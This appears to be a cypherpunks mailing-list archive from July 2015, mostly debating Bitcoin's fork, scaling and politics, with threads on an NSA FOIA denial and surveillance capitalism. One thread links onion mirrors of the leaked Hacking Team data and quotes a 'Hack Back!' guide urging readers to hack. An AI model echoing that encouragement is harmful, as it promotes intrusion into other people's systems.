It's a lot easier for the issuing organization to prove that it has a certain amount of Bitcoin than a certain amount of gold. E-gold and even one of the gold ETFs have been accused of double-counting. And if you're using Tor to connect to the network and break up your transactions, it's pretty easy to obfuscate, even without ZeroCoin, and ZeroCoin just fixes the whole problem. From juan.g71 at gmail.com Mon Jul 6 17:01:11 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 6 Jul 2015 21:01:11 -0300 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> <559a137b.1928370a.3f973.ffffde4a@mx.google.com> Message-ID: <559b16b5.37638c0a.a4a00.698a@mx.google.com> On Mon, 06 Jul 2015 17:04:56 +0000 Sean Lynch wrote: > On Sun, Jul 5, 2015 at 10:41 PM Juan wrote: > > > On Mon, 06 Jul 2015 11:39:00 +1000 > > "James A. Donald" wrote: > > > > > > > > > > Way back in the beginning I said an ever growing block chain would > > > cause unacceptable costs and inconvenience, and lo and behold, it > > > is causing substantial and ever growing costs and inconvenience. > > > > > > > But look at the bright side! Every single transaction gets > > recorded and stored, until jesus destroys the universe > > (it's in the bible). What else can privacy advocates wish for? > > > > > Transparency is also useful, and privacy can be built on top of it > through the use of, say, Chaumian e-cash backed by a blockchain-based > cryptocurrency. It's a lot easier for the issuing organization to > prove that it has a certain amount of Bitcoin than a certain amount > of gold. E-gold and even one of the gold ETFs have been accused of > double-counting.
Well, I wasn't advocating any solution in particular, just making a snarky remark on one of bitcoin's most notable (IMO at least) properties. But since you mention something like e-gold (or similar systems): yes, I realize they have the same problems any ordinary bank has - how to make sure they are not lying. > And if you're using Tor to connect to the network > and break up your transactions, it's pretty easy to obfuscate, even > without ZeroCoin, and ZeroCoin just fixes the whole problem. I guess it's wait and see for me. I freely admit I'm a tad skeptical about the whole crypto infrastructure... (not even taking 'solutions' like tor into account...) From ncl at cock.li Mon Jul 6 16:39:52 2015 From: ncl at cock.li (ncl at cock.li) Date: Mon, 6 Jul 2015 23:39:52 +0000 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599F683.40200@gna.org> References: <5599F683.40200@gna.org> Message-ID: <559B11C8.9030508@cock.li> and are apparently responding to mirrorers with ddos: https://twitter.com/ageis/status/618195459270578176 https://twitter.com/musalbas/status/618200071411265536 https://twitter.com/CthulhuSec/status/618171247847976960 etc. From grarpamp at gmail.com Mon Jul 6 22:01:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 01:01:11 -0400 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599F683.40200@gna.org> References: <5599F683.40200@gna.org> Message-ID: These days, anonymous networks are carrying lots of different types of datasets, including those in the subject...
http://hakteamvayuhxoe7.onion/ http://hacked4pe7dih4ds.onion/ From grarpamp at gmail.com Mon Jul 6 23:07:02 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 02:07:02 -0400 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <5599DC34.1060006@echeque.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> Message-ID: On Sun, Jul 5, 2015 at 9:39 PM, James A. Donald wrote: > substantial and ever growing costs and inconvenience. > > Of course, restraining the block chain to manageable growth without losing > other good characteristics is inherently hard Doubt there's any use case that requires "bignum" worth of single fully independent "full" nodes trucking around tens of TB worth of ancient history. With new things come new rules. Bitcoin could declare 1/2/5/10 year checkpoint intervals by which addresses must forward to new addresses. It could distribute the legacy data across legacy archive farms who demand monetize their existence as daily tx miners do. If for some reason user wasn't able to forward in time, the farms could issue checkpoint statements [for all] or sign their tx for a fee, user might dissolve value back into and out of the farms under contract, etc. Seems many different ways to solve the petabytes / phone problem. And as long as no one, not even the anonymous ever has to go outside bitcoin, such as to an exchange... it's still bitcoin. What's "hard" about bitcoin is deciding how to do the tech while still remaining true to the original philosophies.
From grarpamp at gmail.com Mon Jul 6 23:41:13 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 02:41:13 -0400 Subject: [Cryptography] Crypto Wars In-Reply-To: <201507070155.t671tIsc021152@new.toad.com> References: <559A5C3B.6050600@riseup.net> <14e64978b10.2774.006c0aa2e0fba7cbe3bcf7ae77fa76a2@rogaar.org> <201507070155.t671tIsc021152@new.toad.com> Message-ID: >> elephant wrote: >> Would anyone be able to recommend me good literature on the Crypto Wars? >> Both historical and theoretical accounts (if they exist) would be great, >> digital or printed. Either stuff on the Crypto Wars I or II would be fab. > gnu wrote: > gone from > the Cryptome site, the JYA.com site, and the EFF.ORG sites. But http://cryptome.org/jya/cracking-des/cracking-des.htm http://web.archive.org/web/20000409094154/http://www.heise.de/tp/english/inhalt/te/5124/1.html "I believe we must soon address the risks posed by electronic distribution of encryption software... unless we address this situation, use of the Internet to distribute encryption products will render [our] controls immaterial." -- 1999: USA, FVEY, et al https://www.google.com/search?tbm=isch&q=not+dead+yet https://www.google.com/search?tbm=isch&q=kill+it From grarpamp at gmail.com Tue Jul 7 00:08:08 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 03:08:08 -0400 Subject: NSA liquid cooled computing Message-ID: http://www.grcooling.com/wp-content/uploads/2015/06/NSA-The-Next-Wave.pdf From schear.steve at gmail.com Tue Jul 7 01:05:58 2015 From: schear.steve at gmail.com (Steven Schear) Date: Tue, 7 Jul 2015 08:05:58 +0000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <20150617042859.GX27932@nl.grid.coop> Message-ID: Coming in a bit later here. 
To me the essence of the reasoning for the fork is to head off the possibility that sometime in the not too distant future the demand of bitcoin users to transact on the blockchain will exceed the supply. That certainly might happen if fees don't respond to supply-demand economics. Those pushing bitcoin to compete with MasterCard/VISA are, IMHO, a bit crazy. Like shoemakers always reaching for a hammer, every time these people see a transactional opportunity they reach for the blockchain. I think that's just plain silly. Bitcoin is not well suited for all transactional situations. In the longer-term it seems great to replace, for example, SWIFT and bank wires but rather poor for those that require cheap- or ultra-cheap real-time settlement whereas some alternatives seem tailor-made for this. Then again maybe I am missing the key reasoning for this fork. On Fri, Jun 19, 2015 at 5:07 AM, Dr Adam Back wrote: > It's clear Gavin knows more about Bitcoin code and detailed micro > algorithms than I do (there are many detailed algorithms for anti-DoS > etc at code level which I do not know). > > It's possible I know more than Gavin or have a better internalised > reasoning about the logic and design parameters for about > decentralised systems and distributed trust systems, and ecash > protocols, threat models in p2p privacy systems - which is quite a big > slice of what Bitcoin is trying to do. Or not - I don't know all of > Gavin's expertise nor career experience! Something you may not > realise is a bunch of us on the cypherpunks list back in like > 1995-2005 spent a lot of applied research effort into finding a way to > do something with the characteristics of bitcoin. My PhD is in > distributed systems also.
> > Anyway I do not mean to have claims to authority, particularly because > I believe firmly in pure meritocracy philosophically and detest such > argumentation as a failure of reason, but coincidentally I do actually > know something about it and worked on it on Bitcoin-like system design > and p2p novel trust-model & security model on and off for 20 years. > > But I do think people who are proposing big-blocks are underestimating > and being super-optimistic about a range of things, almost to naive > extent. I am not imputing unsaid things, Gavin wrote many blog posts > on these topics. Mike Hearn made some videos and posts about his > views, and they are quite disconnected from p2p privacy system design > thinking. Someone should probably respond to some of those posts to > clarify why they think some of these assumptions are incorrect and > optimistic to prior experience and precedent. > > Adam > > On 18 June 2015 at 20:24, Sean Lynch wrote: > > > > > > On Wed, Jun 17, 2015 at 3:51 PM Dr Adam Back > wrote: > >> > >> If people on *cypherpunks* can't get the points in the post, I think > >> the world has a problem. The price of security in a distributed > >> system like bitcoin is eternal vigilance, but if people don't > >> understand what constitutes a risk and hence what to be vigilant for, > >> the meta-system can be unreliable and lose its assurances. I think we > >> need to explain some more concepts and probably people will over time > >> learn things and an influencer pyramid emerge as happened in > >> privacy technology. > >> > > > > Yes, I'm sure that when people who disagree with you, it's always because > > they are wrong and never because you don't understand the situation as > well > > as you think you do. I'm sure you know more about Bitcoin than Gavin > does. > -------------- next part -------------- A non-text attachment was scrubbed...
Name: not available Type: text/html Size: 4384 bytes Desc: not available URL: From Rayzer at riseup.net Tue Jul 7 13:32:35 2015 From: Rayzer at riseup.net (Razer) Date: Tue, 07 Jul 2015 13:32:35 -0700 Subject: "Google is to surveillance capitalism what GM was to managerial capitalism" Message-ID: <559C3763.1000205@riseup.net> > Big Other: Surveillance Capitalism and the Prospects of an Information > Civilization > > Shoshana Zuboff, Berkman Center for Internet & Society; Harvard > Business School > > April 4, 2015 > > Abstract: > This article describes an emergent logic of accumulation in the > networked sphere, ‘surveillance capitalism,’ and considers its > implications for ‘information civilization.’ Google is to surveillance > capitalism what General Motors was to managerial capitalism. Therefore > the institutionalizing practices and operational assumptions of Google > Inc. are the primary lens for this analysis as they are rendered in > two recent articles authored by Google Chief Economist Hal Varian. > > Varian asserts four uses that follow from computer-mediated > transactions: ‘data extraction and analysis,’ ‘new contractual forms > due to better monitoring,’ ‘personalization and customization,’ and > ‘continuous experiments.’ > > An examination of the nature and consequences of these uses sheds > light on the implicit logic of surveillance capitalism and the global > architecture of computer mediation upon which it depends. This > architecture produces a distributed and largely uncontested new > expression of power that I christen: ‘Big Other.’ It is constituted by > unexpected and often illegible mechanisms of extraction, > commodification, and control that effectively exile persons from their > own behavior while producing new markets of behavioral prediction and > modification. Surveillance capitalism challenges democratic norms and > departs in key ways from the centuries long evolution of market > capitalism. 
> > Number of Pages in PDF File: 15 > > Keywords: surveillance capitalism, big data, Google, information > society, privacy, internet of everything http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2594754 From l at odewijk.nl Mon Jul 6 22:01:05 2015 From: l at odewijk.nl (Lodewijk andré de la porte) Date: Tue, 7 Jul 2015 14:01:05 +0900 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <5599DC34.1060006@echeque.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> Message-ID: 2015-07-06 10:39 GMT+09:00 James A. Donald : > Way back in the beginning I said an ever growing block chain would cause > unacceptable costs and inconvenience, and lo and behold, it is causing > substantial and ever growing costs and inconvenience. > It is, but also it really isn't. Spending an hour of my lawyer talks to your lawyer costs more than the whole blockchain, including operational costs, for a long time. If you'd like to do anything with a bank, for a fraction of the features at IMMENSELY OVERSIZED WTF prices - just the time spent negotiating it is outrageously more expensive. We're nowhere near unacceptable, and it doesn't seem we will ever be. It's something to think about, and you'll have to use SPV/API's in many cases where there would be some value to not having to use them. That's definitely not convenient, but also not that big a deal. Juan: > But look at the bright side! Every single transaction gets > recorded and stored, until jesus destroys the universe (it's in > the bible). What else can privacy advocates wish for? Bitcoin is often misrepresented to be: * Private * Free * Promoting equality (it does the /exact/ opposite!)
* Jesus Don't play a satire of the shims, Juan. Whales pay liars, just ignore people's words and hear their arguments. The only thing that's hard is realizing so few are doing it. From Rayzer at riseup.net Tue Jul 7 15:11:20 2015 From: Rayzer at riseup.net (Razer) Date: Tue, 07 Jul 2015 15:11:20 -0700 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599F683.40200@gna.org> References: <5599F683.40200@gna.org> Message-ID: <559C4E88.4050506@riseup.net> On 07/05/2015 08:31 PM, Christian Gagneraud wrote: > As nobody has reported it yet, here we go: > https://twitter.com/hackingteam > Ahhh! Here we go... > (In Solidarity with:) “everyone in Gaza, Israeli > conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, > anakata, and all other imprisoned hackers, dissidents, and criminals!” By the hacker who doxxed Hacking Team: > Hack Back! > > A DIY Guide for those without the patience to wait for whistleblowers > > > --[ 1 ]-- Introduction > > I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz > it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple > it is, and to hopefully inform and inspire you to go out and hack shit. If you > have no experience with programming or hacking, some of the text below might > look like a foreign language. Check the resources section at the end to help you > get started. And trust me, once you've learned the basics you'll realize this > really is easier than filing a FOIA request.
> > > --[ 2 ]-- Staying Safe > > This is illegal, so you'll need to take same basic precautions: http://0x27.me/HackBack/0x00.txt (wget this file if paranoid) Via Morgan Mayhem https://twitter.com/headhntr/status/618513829282975744 Mirrored @ my tumblr http://auntieimperial.tumblr.com/post/123489352994 From grarpamp at gmail.com Tue Jul 7 12:21:50 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 15:21:50 -0400 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] Message-ID: > Then again maybe I am missing the key reasoning for this fork. People often miss the fundamental reasons Bitcoin exists, the various conjoined ethos behind its creation. This is to be expected, it's so far outside any thinking or life process they've ever had to do or been exposed to. It's also partly why figuring out what to do or code or adopt, is hard. And certainly not made any easier by the long term need and the current value at stake. Creating a system in which a Botswanan can give a few bits of their impoverished wages to their friend in Mumbai without it being gated, permitted, hierarchied, middlemanned, taxed, tracked, stolen and feed-upon until pointless... this simply doesn't compute for these people. Their school of thought is centralization, profit, control and oppression. So of course they see txrate ramming up against an artificial wall as perfectly fine, it enables and perpetuates their legacy ways. Regardless of whichever technical way the various walls are torn down, what's important is that they are. And that those who are thinking outside the box do, and continue to, take time to school these legacy people such that they might someday become enlightened and join the ethos.
Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG and your favorite government. Probably not as much fun though. From juan.g71 at gmail.com Tue Jul 7 14:57:16 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 7 Jul 2015 18:57:16 -0300 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: Message-ID: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> On Tue, 7 Jul 2015 15:21:50 -0400 grarpamp wrote: > Creating a system in which a Botswanan can give a few bits > of their impoverished wages to their friend in Mumbai What? Bitcoin exists so that rich people in western countries especially the US can become even richer. So far it worked pretty well. Bitcoin hasn't led to any meaningful political/economic change yet, apart from possibly triggering the demise of government cash, which would be a complete disaster. Talk about 'unintended consequences' (unintended?) A likely scenario exists in which there wouldn't be any independent crypto-currency. There would be fully 'traceable' electronic currencies controlled as always by the state and the banking mafia. > without > it being gated, permitted, hierarchied, middlemanned, taxed, > tracked, stolen and feed-upon until pointless... this simply > doesn't compute for these people. Their school of thought is > centralization, profit, control and oppression. So of course they > see txrate ramming up against an artificial wall as perfectly fine, > it enables and perpetuates their legacy ways. > > Regardless of whichever technical way the various walls are torn down, > what's important is that they are. And that those who are thinking > outside the box do, and continue to, take time to school these > legacy people such that they might someday become enlightened > and join the ethos. > > Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG > and your favorite government. Probably not as much fun though. 
From odinn.cyberguerrilla at riseup.net Tue Jul 7 19:08:38 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Tue, 07 Jul 2015 19:08:38 -0700 Subject: Inquiry re. how to handle Glomar reply to FOIA request Message-ID: <559C8626.9070504@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, A while back (specifically, on 6/01/2015) I sent in a FOIA request to the NSA, requesting, in part, records about myself that "would have been collected by the NSA under programs authorized by Sections 206 and 215 of the USA PATRIOT Act, and Section 6001(a) of the IRTPA, aforementioned programs and sections which are now expired as of the date of this request (June 1, 2015)." In essence, I figured, since the underlying legal authority for the program had lapsed (however briefly), there was no time like that present moment to file a FOIA request. And so, I did, not using USPS mail, but a digital service to ensure it would arrive timely. My request was actually rather lengthy; that was just a small part, and I requested any NSA records collected on my person as a result of use of Sections 206 or 215 of the USA PATRIOT Act, or Section 6001(a) of the IRTPA, from Oct. 26, 2001 to the date of expiration and sunset of those Sections on midnight May 31st 2015. (For those who are trying to remember the timeline of what ended up replacing all that, the USA Freedom Act was signed into law on June 2, 2015.) ~~ The NSA failed to respond within the 20 business days required by federal law and sent back a "Glomar response." Technically, as of today, I only have 49 days left to write and send an appeal (based on the date when they sent me their Glomar reply). So... if you have ever done a SUCCESSful appeal of a Glomar response, please reply back to me and let me know (give me some advice, etc). Thanks in advance. 
I've copied a portion of the letter they sent below: "As you may also be aware, there has been considerable coverage of two NSA intelligence programs in the press/media. Under Sec. 215 of the USA PATRIOT Act, as authorized by the Foreign Intelligence Surveillance Court NSA may acquire telephone metadata, such as the telephone numbers dialed and length of calls, but not the content of calls or the names of the communicants. Under Sec. 702 of the FISA, with appropriate authorization, NSA may target non-U.S. persons reasonably believed to be located outside the United States for foreign intelligence purposes. Under the FISC-authorized Sec. 215 authority, NSA cannot review any metadata unless strict requirements are met, the data may be queried only when there is a reasonable suspicion, based on specific facts, that a phone number is associated with a foreign terrorist organization. Likewise, under Sec. 702, there are strict controls approved by the FISC to help ensure that no U.S. person is targeted and FISC-approved minimizations procedures to ensure the protection of any information concerning U.S. persons that may be incidentally acquired. Although these two programs have been publicly acknowledged, details about them remain classified and/or protected from release by statutes to prevent harm to the national security of the United States. To the extent that your request seeks any information on you in relation to NSA intelligence programs, or in relation to any specific methods or means for conducting the programs, we cannot acknowledge the existence or non-existence of such information. Any positive or negative response on a request-by-request basis would allow our adversaries to accumulate information and draw conclusions about technical capabilities, sources, and methods. Our adversaries are likely to evaluate all public responses related to these programs.
Were we to provide positive or negative responses to requests such as yours, our adversaries' compilation of the information provided would reasonably be expected to cause exceptionally grave damage to the national security. Therefore, your request is denied because the fact of the existence or non-existence of responsive records is a currently and properly classified matter in accordance with Executive Order 13526, as set forth in Subparagraph of Section 1.4. Thus, your request is denied pursuant to the first exemption of the FOIA, which provides that the FOIA does not apply to matters that are specifically authorized under criteria established by an Executive Order to be kept secret in the interest of national defense or foreign relations and are properly classified pursuant to such Executive Order. Moreover, the third exemption of the FOIA provides for the withholding of information specifically protected from disclosure by statute. Thus, your request is also denied because the fact of the existence or non-existence of the information is exempted from disclosure pursuant to the third exemption. The specific statutes applicable in this case are: Title 18 U.S. Code 798; Title 50 U.S. Code 3024(i); and Section 6, Public Law 86-36 (50 U.S. Code 3605). (....) Paragraph 3.6(a) of Executive Order 13526 specifically authorizes this type of response, also known as a Glomar response, to a request made under the FOIA, PA, or the mandatory review provisions of this Order. The statutes cited above under the third exemption of the FOIA would also apply to the denial of the fact of the existence or non-existence of the information if sought under the PA. The Initial Denial Authority for NSA information is the Associate Director for Policy and Records, David J. Sherman. As your request is being denied, you are hereby advised of this Agency's appeal procedures.
Any person denied access to information may file an appeal to the CSS Freedom of Information Act/ Privacy Act Appeal Authority. The appeal must be postmarked no later than 60 calendar days of the date of the initial denial letter. The appeal shall be in writing addressed to the (...) - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From juan.g71 at gmail.com Tue Jul 7 16:22:32 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 7 Jul 2015 20:22:32 -0300 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: <559c5f23.c328370a.7776d.1c71@mx.google.com> On Tue, 07 Jul 2015 22:27:01 +0000 Sean Lynch wrote: > On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > > > On Tue, 7 Jul 2015 15:21:50 -0400 > > grarpamp wrote: > > > > > > > Creating a system in which a Botswanan can give a few bits > > > of their impoverished wages to their friend in Mumbai > > > > > > What? Bitcoin exists so that rich people in western > > countries especially the US can become even richer. So far it worked > > pretty well. > > > > Really? What rich person has gotten richer through Bitcoin so far? It seems kinda obvious that virtually all bitcoin developers and users *in the west* are richer than people in Africa and India. That's what I was getting at.
Bitcoin devs - *already rich by 'third world' standards* - are richer now. Millionaires even (notice that grarpamp was talking about impoverished wages...and people) > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > there's plenty of speculation, but your claim that Bitcoin's purpose > is to make the rich richer is also speculation. And FUD. So what amount of btc is being used to make payments between Botswana and Mumbai? What amount of btc is being used to speculate/gamble in a few big, centralized and fully NSA-AML-monitored exchanges? > > > > Bitcoin hasn't led to any meaningful political/economic > > change yet, apart from possibly triggering the demise of > > government cash, which would be a complete disaster. Talk > > about 'unintended consequences' (unintended?) > > > > I can't imagine you've read a single thing written by the people who > influenced the creation of Bitcoin if you think that the collapse of > fiat currencies is an unintended consequence. But I said *cash* not fiat. And the collapse of relatively untraceable *cash* is *bad*. What we may end up with is FIAT currencies and NO CASH option* for those fiat currencies. Bad. Pretty bad. *aka credit cards. > Any fiat currency that > is so bad that its users prefer to use Bitcoin deserves to collapse. > Of course, so far, while Bitcoin has become popular in places like > Argentina Do you know where I live? Of course you don't have to know where I live. But you'll know it in a second anyway. I live in argentina - and let me tell you, bitcoin isnt exactly 'popular' here. > and Venezuela, the US dollar remains by far the more > popular alternative currency in those places. Yep, that's quite correct as far as argentina goes. I suspect it's true regarding venezuela as well. > And if Greece exits the > Euro and starts printing Drachmas there, they will have to worry > about people trading their Drachmas for Euros, not for Bitcoin. 
> > > > A likely scenario exists in which there wouldn't be any > > independent crypto-currency. There would be fully > > 'traceable' electronic currencies controlled as always by the state > > and the banking mafia. > > > > By what evidence do you estimate that this is a "likely" scenario? The evidence is called 'history'. That, and the nature of government and its business 'partners' - or accomplices. > You may be right that many nation-states and banks will be loathe to > accept an untraceable and uncontrollable crypto-currency, but that's > the whole point; You seem to be assuming that an uncontrollable and untraceable crypto-currency exist? I'm not seeing anything of the sort. > they're not going to have a choice. Cryptocurrencies > don't have to be legal to be disruptive. And yet there seems to be a fair amount of people in the bitcoin 'community' who are quite eager (or desperate) to have bitcoin 'regulated' so that it becomes 'respectable', 'legal'...and usable. Of course, this isn't a shortcoming that only affects btc. Anything that the government 'outlaws' becomes harder to transact. > The main problem that > they've run up against before now is the lack of healthy underground > markets to take advantage of them. Given time, governments' and > banks' opinions and policies about cryptocurrencies will become > irrelevant. I do wish that was actually the case, but I think that view doesn't fully take into account the capabilities of the 'enemy'. J. 
From odinn.cyberguerrilla at riseup.net Tue Jul 7 20:52:52 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Tue, 07 Jul 2015 20:52:52 -0700 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> Message-ID: <559C9E94.8010603@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 My thoughts on that... On 07/07/2015 08:07 PM, Juan wrote: > On Wed, 08 Jul 2015 00:08:40 +0000 Sean Lynch > wrote: > > >> >> This is not what most people mean when they say "rich get >> richer." They're talking about 1%ers or whatever. In any case, >> you still seem to be making unfounded claims about the intent >> behind Bitcoin, > > > Let's say I was being cynical =) > > Let's say you were. > >> when we have statements of intent in the creator's own words. > > I know. > > "A purely peer-to-peer version of electronic cash would allow > online payments to be sent directly from one party to another > without going through a financial institution." > > > (Come to think of it, I wouldn't say btc is cash, but that's yet > another philosophical discussion) > > "Online payments to be sent directly from one party to another without going through a financial institution" is indeed what Satoshi intended, and so you could ask, "but what about all the fiat and how do you deal with 'the bank problem?'" Well and good... Satoshi was apparently thinking about that same issue, of a decentralized market within bitcoin, but it just didn't get finished. And in February of 2010, it was stripped out of bitcoin. (Insert ripping sound here.) https://github.com/bitcoin/bitcoin/commit/5253d1ab77fab1995ede03fb934edd67f1359ba8 Go OpenBazaar, etc.
They (and some other similar projects) are carrying the torch of decentralized marketplaces that don't require legacy institutions to operate. > >> Many believe Satoshi is also rich, Bitcoin-wise, but we don't >> even know for sure that they have the key to the account or that >> they will ever spend that Bitcoin. Personally, I hope they do. >> The creator of Bitcoin deserves to be rewarded. >> > > Yes. Anyway, grarpamp comment sounded to me like "We're doing it > for the poor children of africa" which struck me as somewhat > hollow. But nevermind, I'll drop the subject. > > > >> My apologies. I was confused by your use of the phrase >> "government cash." Government cash is fiat, but not all fiat is >> cash. But the cashless societies already being proposed and >> implemented are fully centralized and much easier to trace than >> Bitcoin, because they require bank accounts with their >> concomitant "know your customer" regulations. Bitcoin doesn't >> make this situation worse, > > > True. My comment or observation is that bitcoin may have catalyzed > the move towards a cashless society. Whether a cpunk-like currency > will be used, or a goldman-sachs-like currency will be used remains > to be seen, I think. > > But so be it I guess. If governments are forced to show their true > totalitarian colors to an even larger extent than they do now, > there will be some good in that. > > > >> and by enabling other applications on top of it, including >> untraceable e-cash, will only make it better. >> > > I pledge the "wait and see" amendment =P I hope you're right. > > > >> >> Can you elaborate? Does your use of quotes around the word >> "popular" indicate sarcasm? My understanding was that a number of >> merchants had started using a payment system that used dollars >> from foreign credit cards to buy Bitcoin so that they did not >> have to accept the government-imposed exchange rate. 
> > Actually, there are some people who use credit cards to buy btc > (or other stuff abroad) using a government subsidized exchange > rate. > > There are a couple of official exchange rates. One is set at ~8 pesos > = 1 dollar. The other is at ~10 pesos = 1 dollar. If you buy stuff > using an international credit card, you get the 10:1 exchange rate. > > > Finally there's the real or black market exchange rate at ~13.5 > pesos = 1 dollar. > > So, some people can buy btc (or, say, pay travel expenses abroad) > using the 10:1 rate. The benefit you get doesn't really come from > btc but from the distortions created by govt. By the way, the > subsidy is, of course, financed with more inflation. And yes, the > poorest people here are subsidizing people who travel to > disneyland. > > If on the other hand you want to buy btc in a local exchange the > price you will be asked in pesos is something like the price at > bitstamp multiplied by the $:US$ black market exchange rate. > > https://www.unisend.com/ > > I'm seeing 1 btc = 3800 pesos. And 1 btc = us$ 265. So, that gives > a price of 14.3 pesos per dollar (hm - even more expensive than > black market) > > > > --------- > > I think there's a service here that allows you to pay utility > bills using btc. I'm not sure what's the point because they > (obviously) charge fees so you end up paying more than if you used > pesos directly. I guess it's handy for people who already had btc > but I doubt that number of people is significant. > > > --------- > > > And then there are a few bars and stores that accept btc, in > argentina's capital (~10 million population). Where I live > (rosario) I don't think there's a single store that accepts btc. > > > --------- > > > Now, there probably are people who use btc to move money in and out > of the country although btc's exchange risk and spread aren't > small. > > I know that if you want to move fiat across borders using black > market services, doing so isn't too expensive.
So btc has to face > efficient competition in that area. > > >> I'm definitely interested in your insights on this, since I've >> never visited a country that was experiencing rampant inflation, >> unless you count the US in the late '70s, about the time I was >> entering grade school. > > > There was hyperinflation in argentina in 1989-90 - I was 19 at that > time and I don't really recall much of what happened in everyday > life. I know the prices of stuff in the supermarket changed each > day but I didn't pay much attention. I wasn't really interested in > political economy at that time. > > Then after that 1990 'crisis', the peso was pegged 1:1 to the > dollar for ~10 years, until 2001 when the gov't defaulted and the > banking system blew up. > > Since 2001, the a$/us$ rate went from 1:1 to 13:1 and you can use > that as a relatively good proxy for inflation, although > interestingly, the prices of things like food are at something like > 20:1, prolly reflecting both the inflation of the peso AND the > dollar, plus the fact that the local economy is a fucking mess ran > by fucking protectionists. > > Anyway, the current inflation rate, by argentine standards, isn't > too high, as crazy as that may sound. > > Usually the government cycles in argentina last 10 years or less, > but these shitbags are somehow still clinging to power. > > > >> I think you overestimate the government's ability to exert >> control, something many of the participants in this list have >> devoted their lives to reducing. It's the whole point of Bitcoin, >> so it seems like you're basically just saying "Bitcoin will fail >> at its mission and instead just get coopted by the powers that >> be." > > > Yes, that is what I'm saying. Furthermore, I think that is already > happening. > > https://blog.xapo.com/announcing-xapos-advisory-board/ > > >> Or maybe you think that Bitcoin is just a reckless toy created by >> greedy first worlders? > > > No. I don't consider it a toy.
I don't know how robust (or > scalable...) it actually is (apart from hashing power haha), but > it's not a toy. > > As to motivations, I always assumed that the cypherpunk bunch was > composed of *at least* anarchists, although what I see in this list > is a sizable amount of self-parody (dan geer and accomplices for > instance). > > > However, the bitcoin phenomenon is complex, there's a lot of people > involved the vast majority of whom I don't know at all, so I can't > hardly know their motivations. Greed can certainly play a part > here. > > (and notice that absent government we wouldn't need something like > bitcoin to protect us from government attacks) > > > > > >> >>>> they're not going to have a choice. Cryptocurrencies don't >>>> have to be legal to be disruptive. >>> >>> And yet there seems to be a fair amount of people in the >>> bitcoin 'community' who are quite eager (or desperate) to have >>> bitcoin 'regulated' so that it becomes 'respectable', >>> 'legal'...and usable. >>> >> >> Indeed, something I have repeatedly ranted against. So far the >> regulation has not had much impact on Bitcoin itself. No legally >> "tainted" or "whitelisted" coins yet. > > > True. Regulation hasn't affected the technical/protocol side of > bitcoin. > > Since you mention so called colored coins, wasn't that an idea of > that guy mike hearn, ex member of the google mafia? You think that > kind of people are to be trusted? <---rhetorical question... > > The thing is, regulation will affect how bitcoin is used, and > that's not necessarily related to any technical issue. Whether > you'll need 20 licenses to use bitcoin, or none. That kind of > thing. > > > > >> > >> >> Perhaps, but that actually seems to be the crux of what we're >> arguing about here, and of many arguments on this list. What are >> the actual capabilities of the adversary? You don't want to >> underestimate, but at the same time, if you overestimate, you may >> miss a potential solution. > > > Maybe.
